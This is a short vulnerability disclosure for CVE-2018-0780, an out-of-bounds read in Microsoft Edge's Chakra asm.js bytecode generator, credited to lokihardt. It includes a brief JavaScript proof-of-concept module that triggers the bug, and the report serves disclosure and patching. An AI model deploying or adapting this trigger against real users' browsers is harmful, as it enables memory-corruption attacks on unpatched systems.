Microsoft Edge Chakra suffers from an AsmJSByteCodeGenerator::EmitCall call handling bug.
7852e6e6b74797631b260388f45157c223bcb66924df196f3379c451cad2773b
Microsoft Edge: Chakra: AsmJSByteCodeGenerator::EmitCall call handling bug
CVE-2018-0780
AsmJSByteCodeGenerator::EmitCall which is used to emit call insturctions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as "arr[idx & ...]()". In these cases, the index register remains NoRegister which is (uint32_t)-1. It results in OOB read.
PoC:
function Module() {
'use asm';
function f() {
arr();
}
function g() {
}
var arr = [g];
return f;
}
let f = Module();
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt